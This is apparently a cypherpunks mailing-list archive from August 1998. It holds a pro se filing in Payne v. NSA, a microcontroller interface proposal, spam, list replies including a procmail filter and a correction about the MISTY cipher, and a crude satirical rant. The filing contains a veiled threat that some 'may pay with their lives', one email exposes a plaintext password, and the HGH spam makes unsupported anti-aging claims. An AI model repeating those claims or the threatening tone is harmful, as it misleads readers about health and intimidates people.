  NOW, THEREFORE, IT IS ORDERED that sua sponte, Defendant is DEEMED by the Court to be the NSA, 
  and not Lt. Gen. Kenneth A. Minihan. Future captions for this case should reflect this change.

  IT IS FURTHER ORDERED that Defendant's Motion to Dismiss Plaintiff Morales is GRANTED.

   http://jya.com/whp043098.htm is QUITE CLEAR.

FACT 4   Motions for Rule 54(b) Judgments

    A party may file a motion with the court to certify under Rule 54(b), or the court may do so on its own 
    initiative.

Campos issues Rule 54(b) certification ON HIS OWN INITIATIVE.

     However, I shall await decision on the appeals before the Tenth circuit prior to setting a date for   
     presentment of the classified Declaration or before taking any further action in this case.

FACT 5  Therefore, no Rule 54(b) certification needs to be sought by Appellants-Plaintiffs.

7  Campos did not explicitly state in Campos's June 29, 1998 letter http://jya.com/sec062998.htm

or in Campos' MEMORANDUM OPINION AND ORDER http://jya.com/whp043098.htm that a 

Rule 54(b) decision was issued.  Therefore, Appellants-Plaintiffs seek to clarify Campos intention
    
  Wednesday 8/12/98

  Certified   Return receipt requested 

  Santiago E. Campos, Senior Judge
  P.O. Box 2244
  U.S. Courthouse
  South Federal Place
  Santa Fe, NM 87504-2244

  Re: William H. Payne v. National Security Agency
  Civ. No. 97-0266 SC/DJS

  Dear Judge Campos,

  We assume that your statement

    However, I shall await decision on the appeals before the Tenth circuit prior to setting a date for   
    presentment of the classified Declaration or before taking any further action in this case.

 in your June 29, 1998 letter seen at http://jya.com/sec062998.htm is a sua sponte Rule 54(b) certification
 for immediate appeal.

  If we are incorrect in our assumption, then we ask that you write us and explain why we would need to 
  wait to appeal.

  Clearly we have satisfied the three conditions required for immediate appeal which we are sure you are
  acquainted.  

  If not, however,  these conditions are included  in Federal Civil Rules Handbook  1996, Baicker-McKee,   
  Janssen, Corr, West Publishing Company

  Also, we would ask that you justify seeking permission for appeal from a judge who has issued a  
  MEMORANDUM OPINION AND ORDER when appellants have satisfied Rule 54(b) conditions if you   
  choose to respond negative.

  If we do not hear from you Monday August 31, 1998, then we will treat our assumption as correct.

  Sincerely

  
  William H. Payne             	   	 Arthur R. Morales
  13015 Calle de Sandias NE          	               1024 Los Arboles NW
  Albuquerque, NM 87111              	 Albuquerque, NM 87107       
    
 8  Appellants-Plaintiffs receive   Exhibit C

  UNITED STATES COURT OF APPEALS 
  FOR THE TENTH CIRCUIT 
 
  WILLIAM H. PAYNE; ARTHUR R. 
  MORALES 
					Nos. 98-2156 
    	Plaintiff - Appellants,		        98-2157 
 
  NATIONAL SECURITY AGENCY, 
             Defendant - Appellee. 


                                ORDER
		Filed August 6, 1998

    The appellants and appellee are granted additional time until September 21, 1998
  to this court's show cause order of June 30, 1998.  All other requests contained in the
  appellants; motion filed August 4, 1998 are referred to the panel of judges who will hear
  this case on the merits.

			Entered for the Court
			PATRICK FISHER, Clerk of Court

			by: signature Randy Simmons?
  			Deputy Clerk

A  Hearing MUST be corrected to include defendant Minihan.

B  Clerk FISHER has not addressed his removal from the appeal for previous title 18 felony violations of

law.

C  ORDER does not address selection of three judge panel so not to include judges accused of Title 18 felony

violations of law or biased judges.

WHEREFORE    

9  CORRECT ORDER Filed August 6, 1998 to include NSA Director Minihan. for reason

              1  Find out who is RESPONSIBLE  
	2  Hold them ACCOUNTABLE 
	3  Hold them individually and their agency FINANCIALLY LIABLE   

Some may pay with their lives for http://www.aci.net/kalliste/speccoll.htm   
http://caq.com/cryptogate  http://jya.com/whpfiles.htm  http://www.qainfo.se/~lb/crypto_ag.htm 
if this matter is NOT PEACEFULLY SETTLED.

10  EXPLICITLY RESPOND to request for removal of clerks FISHER and Hoecker from this appeal.

11  EXPLAIN how an unbiased panel of judges can be found at the Tenth circuit.

Respectfully submitted,    
        
   
                    William H. Payne             	   	        
                    13015 Calle de Sandias NE          	        
                    Albuquerque, NM 87111              	        
    
 			   
                       
                    Arthur R. Morales                               
                    1024 Los Arboles NW                            
                    Albuquerque, NM 87107                           
    
                    Pro se litigants    
    
    
               CERTIFICATE OF SERVICE    
    
I HEREBY CERTIFY that a copy of the foregoing response and motion   
was mailed to Lieutenant General Kenneth A. Minihan, USAF,    
Director,  National Security Agency, National Security Agency,    
9800 Savage Road, Fort George G. Meade, MD 20755-6000    
and mailed to Jan E Mitchell, Assistant US Attorney,    
9 Floor, Bank of America Building, 3rd and Tijeras, ABQ, NM 87102    
an original and three copies as required by FRAP 27(d)    
http://www.ca5.uscourts.gov/docs/frap-iop.htm#27d United States Court of    
Appeals for the Tenth Circuit, 1823 Stout Street, Denver, Co 80257 by CERTIFIED     
RETURN RECEIPT REQUESTED mail August 12, 1998.   




9





         	WEED KILLER computer interface proposal section 7/27/98 10:11 AM

Solution to controlling and collecting data from the WEED KILLER involves interfacing a personal computer
running a version of the Windows operating system to the WEED KILLER analog/digital hardware.

Windows is not a real-time operating system, therefore  microcontroller controller/collector hardware 
interface must be installed between a Wintel PC and the WEED KILLER hardware.

Essence of the Wintel data collector problem is that Windows 3.x or 9x responds to a hardware interrupt
usually between 70 to 150 microseconds.  In rare occasions the interrupt latency may extend to 1.5 
milliseconds or even longer.  A microcontroller responds to an interrupt in several microseconds.

Wintel hardware controller interface is even more difficult than collection for the reason that the Windows 
operating system only gives control to an application when Windows decides.  In the collection, mode at
least a hardware interrupt signals Windows that the application wants control.  However, the microcontroller
can send the Wintel an interrupt asking the applications code whether there is any message it needs to
send the microcontroller.

Microcontrollers have specialized timers, serial expansion ports and are, therefore, designed to be interfaced to 
analog and digital hardware. 

An 80C32 family microcontroller is proposed for the WEED KILLER application for reasons.

1  The 80C32 will do the job.

2  Multiple vendors of 80C32 guarantee future supply at a competitive price.  Current suppliers include
 Intel, AMD, Winbond, Dallas, Philips, Siemens, OKI,  ATMEL, ... 

3  High-speed parallel port bi-directional IEEE 1284 enhanced capability port 9 (ecp) communications 
hardware between an 80C32 and PC is in the final stage of development.

4  IEEE 1284 hardware drivers are supplied with Windows NT.  Custom assembler dll drivers are available
for 9x and 3.x.

5  A public-domain Forth 8051 operating system hosting a high-level language and interactive assembler with 
complete source code documentation is available on Internet. http://jya.com/f86/whpf86.htm

Hardcover book further documenting 5 is available from Academic Press.
http://www.apcatalog.com/cgi-bin/AP?ISBN=0125475705&LOCATION=US&FORM=FORM2

Only a Wintel machine is required for both hardware and software for the WEED KILLER project.  

Usually a Forth hardware/software development probject on requres a voltmeter, logic probe, and, 
infrequently, an oscilloscope.  Reason  is the INTERACTIVE control of the hardware and software
from a PC keyboard and diagnostic information easily printed to a PC monitor.

Justification for assertion made in the above paragraph comes from Internet.

NASA uses Forth extensively for its space programs. http://groucho.gsfc.nasa.gov/forth/

Ballard used polyForth http://av.yahoo.com/bin/query?p=polyforth&z=2&hc=0&hs=0
to locate wrecks of the Titanic, Bismarck, and Yorktown.
http://www.nationalgeographic.com/features/98/midway

Sun Microsystems workstation boot into Forth then invokes Solaris. http://playground.sun.com/pub/1275/

Adobe Postscript is a version of Forth. 
http://www.mactech.com/articles/mactech/language/forth-postscript.html

Video game software are written mostly in Forth.

The Wintel side of the WEED KILLER project will be most-likely written in a small
amount of assembler interface code and Visual Basic.

While Forth threaded code software technology is extremely valuable in some settings,
it is not in others.

Java is a variation of Forth.  http://www.mrl.nyu.edu/meyer/jvmref/

Future of Java on Wintel machines is unclear at this time.

For example,

  The hottest items among techies is a browser called Opera.   
  This is a $40 shareware program that in speed and compact   
  size buts both IE and Communicator to shame.  It has a slightly   
  different interface from either of the majors - an interface some find    
  refreshing while other find less than useful.  As it's shareware, you can   
  try and then buy if you like it.  One reason for its speed is that it ignores   
  Java - the Internet's Bandwidth Pig (IBP).   
 
  The Rumor Mill by Paul Cassel
  ComputerScene Magazine  July 1998   
   
Forth executes code High-level at about 10% the speed of a compiled high-level
language.

Speed of execution of small applications is not effected by Forth's slow execution.

Reason is that initial code is written in high-level Forth.  

Inner loops are then translated into Forth assembler.

Speed is maintained with the advantage that data structures are created an maintained in
high-level language while the interactive operating system is retained for trouble shooting
both hardware and software problem.

Hardware cost of building the 80C32 the WEED KILLER boards is estimated at $10k.

Hardware design is estimated at 1 month labor at $50/hr for a total of $8k.

Software development on the 80C32 side in Forth and Forth assembler, software on the
Wintel side in Visual Basic and assembler, documentation, and training is estimated to
be 4 months for a total of $32k
   
 /\/\/\
end



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mscompia@microsoft.com
Date: Wed, 12 Aug 1998 08:19:36 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Information From The Microsoft Personal Information Center
Message-ID: <0b8075019150c88UPIMSSMTPSYS08@msn.com>
MIME-Version: 1.0
Content-Type: text/plain


Here is your password you requested from the Microsoft Personal Information Center at http://register.microsoft.com/regwiz/personalinfo.asp.

Password: writecode

If you continue to have access problems or want to report other issues, please contact us through the Write Us button at the top of any Microsoft page.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: GIGABIZOP@hotmail.com
Date: Wed, 12 Aug 1998 12:54:36 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: GROW YOUNG WITH HGH!
Message-ID: <199808121954.MAA02292@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


What if you had a product with real results in the battle against 
the effects of aging? 

What if you could reverse aging?

What if without changing your lifestyle you could: 

 Lose weight without dieting or exercising. 
 Improve sexual drive and performance. 
 Increase muscle size without exercise. 
 Have superior immune function. 
 Have younger, tighter, thicker skin. 
 Eliminate cellulite. 
 Lower blood pressure. 
 Improve cholesterol profile. 
 Improve hair and color regrowth. 
 And dramatically support proper sleep cycles...and more. 

Fully supported by The American Academy of Anti-Aging. New York 
Times Best Selling Book "Grow Young with HGH". This awesome 
product is documented in thousands of case studies, check it out! 
You deserve to check this product out and FEEL YOUNG AGAIN! Visit 
http://www.designnet-pro.com/iops/hgh. 

30 Day Money Back Guarntee on Product Plus FREE Audio Cassette 
Interview with Dr. Ronald Klatz - President of the America Academy 
of Anti-Aging! Visit http://www.designnet-pro.com/iops/hgh

Could you imagine a business opportunity selling the "Fountain of 
Youth"? The testimonials on this product are incredible visit 
http://www.designnet-pro.com/iops/hgh NOW!
-----------------------------------------------------------------
If you wish to be removed from future mailings please reply with 
REMOVE to this return address and we will remove you from future 
mailings. Thank you for your time.

 
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Markus Kuhn <Markus.Kuhn@cl.cam.ac.uk>
Date: Wed, 12 Aug 1998 03:31:18 -0700 (PDT)
To: Anooshiravan Merat <merata@sums.ac.ir>
Subject: Re: Curis LeMay theory of responsibility
In-Reply-To: <Pine.LNX.3.96.980812123101.6227A-100000@pearl.sums.ac.ir>
Message-ID: <E0z6Y94-00030P-00@heaton.cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


Anooshiravan Merat wrote on 1998-08-12 08:09 UTC:
> hey mister 'payne' in the ass, i've been telling you for more than 5
> months now, and i told you that was the last time i was gonna ask you
> politely now STOP SENDING ME EMAILS YOU ASSHOLE

Over 4000 US doctors have proved: Email filters REDUCE YOUR BLOOD PRESSURE.

It WORKS!!!!!

Get procmail ***NOW*** from

  ftp://ftp.informatik.rwth-aachen.de/pub/packages/procmail/procmail.tar.gz

and read the files named README, INSTALL and FAQ.

It is COMPLETELY FREE OF CHARGE!!!!

SATISFACTION ***GUARANTEED***

(Just testing whether a spammy writing style increases attention ;-)

Markus

-- 
Markus G. Kuhn, Security Group, Computer Lab, Cambridge University, UK
email: mkuhn at acm.org,  home page: <http://www.cl.cam.ac.uk/~mgk25/>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Global Web Builders <gwb@gwb.com.au>
Date: Tue, 11 Aug 1998 19:41:35 -0700 (PDT)
To: (Recipient list suppressed)
Subject: One Nation update: Small Business Policy and Four Corners
Message-ID: <1.5.4.32.19980812014218.0095e800@gwb.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Dear One Nation supporter in NSW

Small Business policy:

Pauline Hanson's One Nation Small Business policy will be released on the
Internet at 2pm Australian Eastern Standard Time today. (Media embargo until
2pm)

We would encourage you to please visit the page with the policy document
which has the main thrust of:

Giving small business priority over large business where possible. This
includes  forcing big corporations and multinationals to pay their fair
share of our tax burden etc....

The link will be from the main One Nation page at:
http://www.gwb.com.au/onenation/index1.html

the summary small business policy will be at:
http://www.gwb.com.au/onenation/policy/business1.html

after 2pm.

Please print out and circulate this policy document as far and as wide as
you can so that you can assist us in counter-acting the obvious media
distortions that will follow.

------------------

Four Corners report last Monday:

We apologise for the incorrect statement that we gave you in our last post
last week when we said: 

"On Monday night (10th August) the ABC's Four Corners programme will be
looking at One Nation and the media." 

It appears that the rules of engagement were changed once again by the media
in a report headed "Inside One Nation". 

The writer was personally interviewed for 3 hours by reporter Tony Jones at
his office to discuss the (to quote Jones) "The blatant misreporting by the
media on One Nation." The writer was clearly told that the ABC report was to
be along these lines - thus our statement last week. None of the interview
with the writer was used in the report - you can draw your own conclusions.

We can only assume that the ABC's Four Corners program have, in this case,
joined Channel 9's 60 Minutes program in slanted reporting against the party.

You might recall Mr Brendan Bogle the 25 year old ex-President of Petrie
branch was one of many who made negative and incorrect statements about One
Nation on the Four Corners report. Bogle this week told the media that
"there would be a mass desertion of 200 One Nation members from Petrie
branch to the Nationals". 

Last night 5 One Nation members attended "his" branch meeting. Not all
joined the National Party -  who were represented there by Senator Boswell.
When questioned why the other 200 had not attended Bogle told the media that
they had been "intimidated".
This is blatantly untrue. They did not support him nor his inflammatory
comments made on Four Corners on Monday.

We would ask that you be aware of the bias in some reports and consider what
the real agenda is behind some of the reporting seen on the screen and in
the papers today.

GWB



Scott Balson

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Wed, 12 Aug 1998 10:45:48 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - August 12, 1998
Message-ID: <199808121731.MAA14422@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain




==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

If you cannot open the icon/attachment, please visit
http://www.wow-com.com/professional/    for the wireless 
daily news.

Don't miss the major conference on implementing 
Phase 2 of the E-911 requirement--August 26-27 
in San Francisco.  For more information, click 
http://www.wow-com.com/pdf/locntech.pdf 
===========================================
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anooshiravan Merat <merata@sums.ac.ir>
Date: Wed, 12 Aug 1998 01:11:45 -0700 (PDT)
To: bill payne <billp@nmol.com>
Subject: Re: Curis LeMay theory of responsibility
In-Reply-To: <35D0F09A.1F4F@nmol.com>
Message-ID: <Pine.LNX.3.96.980812123101.6227A-100000@pearl.sums.ac.ir>
MIME-Version: 1.0
Content-Type: text/plain


hey mister 'payne' in the ass, i've been telling you for more than 5
months now, and i told you that was the last time i was gonna ask you
politely now STOP SENDING ME EMAILS YOU ASSHOLE





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Wed, 12 Aug 1998 03:41:32 -0700 (PDT)
To: "Brown, R Ken" <brownrk1@texaco.com>
Subject: Re: Internet is rickety
In-Reply-To: <896C7C3540C3D111AB9F00805FA78CE2013F833B@MSX11002>
Message-ID: <35D17113.88AEB4B0@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain


Brown, R Ken wrote:
> 
> You implement security on the systems in which you
> have an interest. If you run a large email server you secure
> that. If you don't want people to read what's on your
> own PC, you secure that. If we all look after what's in
> our own hands it will all work.

I agree in theory. However, I can see that in practice there is
some problem. This stems from 'we', a term that encompasses people
with partly opposite intentions and goals. That's life unfortunately.
But there is indeed much that one can do if one takes effort to do,
I think.

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <Laurent.Demailly@Sun.COM>
Date: Wed, 12 Aug 1998 14:35:41 -0700 (PDT)
To: Markus Kuhn <Markus.Kuhn@cl.cam.ac.uk>
Subject: Re: Curis LeMay theory of responsibility
In-Reply-To: <Pine.LNX.3.96.980812123101.6227A-100000@pearl.sums.ac.ir>
Message-ID: <13778.2588.314130.506856@pomerol>
MIME-Version: 1.0
Content-Type: text/plain



I'll second that and add the rule I'm using for cypherpunks
filtering so far:

########
# annoyance/spam/ads/pr0n/... : junked
:0
* ^From:.*<(stuffed@stuffed\.net|billp@nmol\.com)>
/dev/null
########


Markus Kuhn writes:
 > Anooshiravan Merat wrote on 1998-08-12 08:09 UTC:
 > > hey mister 'payne' in the ass, i've been telling you for more than 5
 > > months now, and i told you that was the last time i was gonna ask you
 > > politely now STOP SENDING ME EMAILS YOU ASSHOLE
 > 
 > Over 4000 US doctors have proved: Email filters REDUCE YOUR BLOOD PRESSURE.
 > It WORKS!!!!!
 > 
 > Get procmail ***NOW*** from
 >   ftp://ftp.informatik.rwth-aachen.de/pub/packages/procmail/procmail.tar.gz
 > and read the files named README, INSTALL and FAQ.
 > 
 > It is COMPLETELY FREE OF CHARGE!!!!
 > 
 > SATISFACTION ***GUARANTEED***
 > 
 > (Just testing whether a spammy writing style increases attention ;-)
Heheh


-- dl speaking for himself only




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vin McLellan <vin@shore.net>
Date: Wed, 12 Aug 1998 11:39:35 -0700 (PDT)
To: "Nobuki Nakatuji" <bd1011@hotmail.com>
Subject: Re: Mitsubishi Electric Corp. has decided to make its MISTYpublic key......
In-Reply-To: <19980812064612.2435.qmail@hotmail.com>
Message-ID: <v04003a04b1f78e3c98af@[198.115.179.81]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:46 AM -0400 8/12/98, Nobuki Nakatuji wrote:
>Mitsubishi Electric Corp. has decided to make its MISTY public key
>encryption algorithm available free of charge in an attempt promote its
>use.

	Sir: Your report is at least partially incorrect, and inevitably
misleading. Melco's MISTY is not a PKC, it is a suite of two secret-key
block ciphers using 64-bit blocks and 128-bit keys. I don't know details
about the availability of MISTY code from Melco or what license
arrangements are now available, but at least one of the MISTY algorithms
(MISTY1) was published as an IETF RFC (and Melco has always said it hoped
to make MISTY a standard.)

	The Melco websites don't seem to offer any new infomation about
MISTY licenses or pricing, and I believe the Mitsubishi staff is still on
company-wide vacation. You may wish to review your source info.

-----
      Vin McLellan + The Privacy Guild + <vin@shore.net>
  53 Nichols St., Chelsea, MA 02150 USA <617> 884-5548
                         -- <@><@> --






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: BestRates98@msn.com
Date: Wed, 12 Aug 1998 19:16:43 -0700 (PDT)
Subject: 8.9 Long Distance & 8.9 for 800 & 15.9 CallCard
Message-ID: <199808130216.TAA05474@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



THIS IS NOT SPAM! The "TELECOM RATE DIGEST" is available by subscription
only. You have either subscribed, left your name at one of our many links
on the Web, or sent us email in the past. See below for REMOVE instructions.
  
The Fall issue of the "TELECOM RATE DIGEST" is dedicated to offering you
the best values available in Domestic and International telephone calling.  
 ************************************************************************
 
To be REMOVED from this publication and never receive another
correspondence from us, Send an email to: <A
HREF="Mailto:Remove@savebig.com">REMOVE</A>
and type the word REMOVE in the SUBJECT field. Our apologies for any
inconvenience. Please allow up to 48 hours for the REMOVE to take effect.
 ************************************************************************

   
             WHEN RESPONDING, PLEASE INCLUDE YOUR STATE.

 1)  8.9 cents per minute, 24 hour state to state rates for regular 1+
calling. Low Intrastate rates as well. (Let us know which state you're in.)
NOTE WELL: If you live in PA, NJ, NY, MD, DE, DC, VA, CA, NV, RI, CT, MA,
and have monthly long distance billings in excess of $400, your state to
state rate will be 7.9 cents per minute.)<A
HREF="Mailto:Sales@savebig.com">DIAL 1 SERVICE</A>

 
 2)  8.9 cents per minute, 24 hour state to state rates for inbound 800/888
service. Low Intrastate rates as well.(Let us know which state you're
in.)TOLLFREE SERVICE


 3)  Superb International Rates. Let us know what countries you call.
INTERNATIONAL RATES

 
 4)  15.9 cents per minute Stand-Alone Calling Card with NO SURCHARGES.
(Calling Card is NOT prepaid; you receive a bill and pay by check or bill
charges to a credit card. It is NOT necessary to switch long distance
carriers to receive a calling card.)
CALLING CARD

 5)  International Calling Card with great rates and NO SURCHARGES.
   INTERNATIONAL CARD
  
All these programs are billed in 6 second increments with only a 6 second
call minimum. There are NO Billing Fees, NO Charges, NO Catches, NO
Surprises whatsoever. You only pay for the calls themselves!  
  
**BLUE CHIP CARRIERS provide total fiber optics for crystal clear
connections.**
 
 ***THESE RATES ARE AVAILABLE TO BUSINESS AND RESIDENTIAL USERS***
This means that ANYONE can now have their own low cost 800/888number!!!!
REMEMBER, AN 800/888 LINE RINGS INTO AN EXISTING PHONE NUMBER; NO NEED TO GET
AN ADDITIONAL PHONE LINE.
 
 For complete details send email or call. In the body of the message
 indicate which services you are interested in. We will send full details
 instantly.

 ** FOR INTRASTATE RATES BE SURE TO TELL US WHICH STATE YOU LIVE IN.**

      ROCK BOTTOM INTERNATIONAL RATES ARE ALSO AVAILABLE.

 
  
 PHONE 305 447 4105             FAX 305 461 1085                  
 
 
IF YOU EMAIL OR FAX, PLEASE BE SURE TO INDICATE THE PROGRAM(S) YOU WOULD
LIKE INFORMATION ON. BE SURE TO MENTION WHICH STATE YOU LIVE IN.
 
 
  
  

















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Nobuki Nakatuji" <bd1011@hotmail.com>
Date: Wed, 12 Aug 1998 22:00:08 -0700 (PDT)
To: vin@shore.net
Subject: Re: Mitsubishi Electric Corp. has decided to make its MISTY    public key......
Message-ID: <19980813045935.16450.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain


>At 2:46 AM -0400 8/12/98, Nobuki Nakatuji wrote:
>>Mitsubishi Electric Corp. has decided to make its MISTY public key
>>encryption algorithm available free of charge in an attempt promote 
its
>>use.
>
>	Sir: Your report is at least partially incorrect, and inevitably
>misleading. Melco's MISTY is not a PKC, it is a suite of two secret-key
>block ciphers using 64-bit blocks and 128-bit keys. I don't know 
details
>about the availability of MISTY code from Melco or what license
>arrangements are now available, but at least one of the MISTY 
algorithms
>(MISTY1) was published as an IETF RFC (and Melco has always said it 
hoped
>to make MISTY a standard.)
>
>	The Melco websites don't seem to offer any new infomation about
>MISTY licenses or pricing, and I believe the Mitsubishi staff is still 
on
>company-wide vacation. You may wish to review your source info.
>
>-----
>      Vin McLellan + The Privacy Guild + <vin@shore.net>
>  53 Nichols St., Chelsea, MA 02150 USA <617> 884-5548
>                         -- <@><@> --
>

http://www.melco.co.jp/news/1998/0805-b.htm

but,It is written in Japanese.



______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 12 Aug 1998 13:25:57 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199808122025.WAA07874@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


 From high-tech privacy to low-tech politics, Clinton's
                video testimony raises novel issues. There is the basic matter
                of preventing electronic eavesdropping, a presumed concern
                of all the parties and one that will require the use of
                sophisticated encryption technology. There is the political
                consideration that, under certain circumstances, tape of
                Clinton's testimony could end up in Republican attack ads or
                television news shows.

http://www.latimes.com/HOME/NEWS/NATION/t000073443.1.html



"An armed society is a polite society." - Robert Heinlein


	





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Entropy <sysadmin@thegrid.net>
Date: Thu, 13 Aug 1998 11:50:08 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199808131850.LAA11217@pop.thegrid.net>
MIME-Version: 1.0
Content-Type: text/plain


please take us off your mailing list.

our address that the mail is being sent to is: sysadmin@thegrid.net
we appreciate your mail but the volume is slightly overwelming for us to
handle..
sincerely, burke bryant





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jojo333@yahoo.com
Date: Fri, 14 Aug 1998 20:41:40 -0700 (PDT)
To: jojo333@yahoo.com
Subject: home loans, consolidate debt
Message-ID: <199808130854.IAA02084@ns.inforedmx.com.mx>
MIME-Version: 1.0
Content-Type: text/plain


Mortgage rates are at an all time low!

Would you like to pay off all your debts, have money for home
Improvements, or cash for any purpose?

If you live in the U.S., own a home, and need any of the following:

 One easy low payment for all your debts.

 Cash for home improvements, vacations, etc.

 Money for your child's education.

 A lower interest rate 2nd mortgage

 Consolidate your credit cards into one lower payment

http://www.geocities.com/Baja/Canyon/7296/ 

Be debt free up to 3 times faster than what you are currently paying
off.

Pay off your car and credit card loans. 

Apply today with Loan Generator for an easy no cost, and no obligation
home loan to see how to make a home equity loan work for you!


**Even if you have been denied before, we may be able to help you! 

We fund with our own money!

APPLY TODAY, IT'S FREE!!

http://www.geocities.com/Baja/Canyon/7296/ 

To learn more about how you can be debt free, and have all your
Financing

Options explained to you visit http://www.geocities.com/Baja/Canyon/7296/  or
call 

714 595-1050 for more information.

Our financial consultants will be able to speak with you for no
Obligation.










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: toto@fhouse.org
Date: Thu, 13 Aug 1998 08:13:17 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Deaf Cons 5.9
Message-ID: <TCPSMTP.18.8.13.9.27.54.2847582152.1143268@fhouse.org>
MIME-Version: 1.0
Content-Type: text/plain

                          *** The Fire House Inn ***
                                 Come visit us
                               Telnet: fhouse.org
                                WWW:  fhouse.org
                                  *********** 

DeafCons 5.9



[WAS: Class of 1998 Home For The Criminally Insane Escapee Reunion]





[NEVER WAS: If this is the rEvolution, then why are T-shirt prices so high?]



[WILL BE: I QUIT!!!]





[WILL NEVER BE: If It Slays The Life Of A Single Ethnic Group of Children]



Return From Beyond The Valley Of The Planet Of The LAST CHAPTER

Of the LOST CHAPTER Of The BLAST CHAPTER Of The Non-Sequitor

Non-Sequential Inconsequential Boring Blase Blatherings Of:

SPACE ALIENS HIDE MY DRUGS!!!

SPACE DRUGS HIDE MY ALIENS!!!

SPACE HIDES DRUG MY ALIENS!!!

SPACE ALIENS DRUG MY HIDE!!!!

HIDE MY SPACE ALIENS DRUGS!!!

_____________________________



  Taoist Synchrinocity being what it is, the moment that I typed

in the Deaf Cons 5.9 chapter heading above, the TV-screen came alive

with the sight of a bunch of half-naked, half-drunk, wholly red-necked

guys named Bubba, BobbingForPigsFeet at the RedNeck Games, in ButtFuck,

Georgia. (Rumored to have been infiltrated, if not organized by, Circle



of Eunuchs initiate Alec McCrackin.)

  The sight of grown men (notice I refrained from using the word 'adults')

bending over head-first in large buckets of water, with their large

ButtCracks showing, with their heads suddenly emerging from the water

with a PigsFoot between their teeth, throwing it on the ground and once

again throwing their heads back into the water, again positioning their

exposed ButtCracks as their most prominent feature...

  Well, let's just say that the press coverage of the RedNeck/ButtCrack

Games was a striking confirmation of the TruthVision that came to me as

my 12-Volt AC/Bulb was lit up by the 110-Volt DC/AnalogueElectronJuice

being emitted from the CIA/Mafia Digital Implant of the PlasticBadge Security

Representative of the Plaza Hotel in Lost Wages, Nevada. MeatSpace Home

of Deaf Cons 6.0, an alleged HackersCrackersPhreaks&Geeks conference at

which no one seemed interested in acquiring a root password into the

RCMP computer system.



  The TruthVision (TM) started building when I realized that I was not,

as my original intention had been, attending the Class Of 1998 Home For

The Criminally Insane Escapee Reunion (although a lot of those attending

Deaf Cons 6.0 seemed to run with the same crowd...if you know what I mean), 

nor was I at the Young Republican's Convention, my second choice, at which

I hoped to be able to convert some of the more StraightArrow  YouthOfAmerica

into DegenerateBrainDamagedPsychoticShitDisturbers.

  The TruthVision began to Throb&Drip as I realized that the DigitalFreaks

and the EndangeredSharpHackledHackers were paying the same prices fo

DigitalrEvolutionary T-Shirts&Mugs as YoungRepublicans and LargeButtCrack

RedNecks do at their own gatherings.

  The TruthVision began to Pulsate&Squirt, beginning to run down myu leg

and into my shoes, as I my questions regarding the identities of various

individuals at the conference were met with pseudo-suspicious responses,

despite the fact that the RealSpooks (TM) attending the conference no

doubt were in possession of full computer print-outs on all of those wheo

were attending the conference, complete with color-glossies, nID #'s,

personal and credit histories, names of their dogs and their first and

current boy/girl/friend(s), etc., ad infinituum.



  The TruthVision (TM) ultimately BlewIt'sWad all over my formerly clean

JockeyShorts&LeeRiderJeans as I was being escorted out of the Plaza Hotel,

HomeOfThePennySlotMachines, by an overly-excited SecurityGuard who managed

to impress me with exceedingly serious nature of my 'crime' of having

announced the issuance of a Real&Immediate !!!BOMBTHREAT!!! against the

Plaza Hotel and the Deaf Cons 6.0 Conference, without ever managing to

explain why, if this was indeed the case, I was simply being escorted to

the door and removed from the building, instead of being charged, or held

for questioning, or somesuch, as the building was being evacuated fothe

safety of the hotel's clients and guests.

  The TruthVisionOrgasm was enhanced in a manner very similar to that

provided by the FrenchTicklers sold at TruckStops around the nation, by

the apparently inadvertant revelations of the PlasticBadgeSecurityGuard

in regard to the information shared with Plaza Hotel Security Personell

by ShadowyFiguresFromNonDescriptGovernmentAgencies about my presence at

Deaf Cons 6.0 and personal details of my SorrySordidPersonalHistory.





  In actual fact, the TruthVision Proper (TM) encompasses a lifelong

accumulation of Analogue/Digital Information/Data which coalesced as the

result of the LorenaBobbit of HotelSecurity cutting off my experience of

Deaf Cons 6.0 at the point when the DigitalCounter recording the event

stood at Deaf Cons 5.9, thus forcing myself to use my own imagination and

my F-Finger to FinishTheJob, like a RedNeckBride on her wedding night,

as Bubba gets his nut, rolls over, and goes to sleep.

  The TruthVisionCosmicOrgasm was the rough equivalent of reaching a point

